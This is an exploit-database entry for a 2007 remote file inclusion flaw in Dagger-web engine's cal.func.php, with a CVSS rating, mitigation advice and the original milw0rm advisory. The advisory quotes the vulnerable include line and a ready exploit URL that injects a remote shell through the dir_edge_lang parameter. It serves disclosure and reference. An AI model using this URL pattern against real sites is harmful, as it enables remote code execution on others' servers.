header-logo
Suggest Exploit
vendor:
Dagger-web engine
by:
katatafish (karatatata@hush.com)
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Dagger-web engine
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Dagger-web engine Remote File Inclusion

The vulnerability allows an attacker to include a remote file via the 'dir_edge_lang' parameter in the 'cal.func.php' file. This can lead to remote code execution on the affected system.

Mitigation:

Apply security patches provided by the vendor. Review and sanitize user input to prevent remote file inclusion vulnerabilities.
Source

Exploit-DB raw data:

###Dagger-web engine(cal.func.php)Remote File Inclusion###

#download:
http://kent.dl.sourceforge.net/sourceforge/dagger/dagger_r23jan2007.
zip

#found by: katatafish (karatatata@hush.com)

#code:  (cal.func.php)
include($dir_edge_lang.'cal_lang.inc.php');

#exploit:
http://www.site.com/[path]/cal.func.php?dir_edge_lang=[SHELL]

#Thanks: str0ke

# milw0rm.com [2007-06-24]

Navigation

Suggest Exploit

Services By CQR